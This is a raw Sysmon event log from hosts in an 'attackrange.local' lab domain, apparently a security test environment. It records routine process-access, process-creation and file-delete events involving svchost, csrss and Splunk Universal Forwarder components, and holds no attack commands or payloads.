16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246075Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246074Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246073Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246072Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246071Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246070Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246069Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246068Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246067Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5220-6063-BE22-00000000AF01}96C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246066Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5220-6063-BE22-00000000AF01}96C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246065Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.973{CB4067E1-5220-6063-BE22-00000000AF01}96C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246064Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.629{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE20BA475390F3FB011CAC8D51C2D412,SHA256=DB5EBF60D365FDA01F2550889FA92695E20AEAD7288F1DD8675E1A83F52A22B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000246063Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-5220-6063-BD22-00000000AF01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246062Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246061Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246060Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246059Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246058Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246057Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246056Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246055Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246054Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000246053Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-5220-6063-BD22-00000000AF01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000246052Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-5220-6063-BD22-00000000AF01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000246051Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.301{CB4067E1-5220-6063-BD22-00000000AF01}2444C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000246050Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:30:24.238{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E69C5BE5D9CE21B462687BD776D68AF6,SHA256=C6A126F82E052774C6E6FD35D174368A1587D3440B2D74401031F679DA1CFBFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061355Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 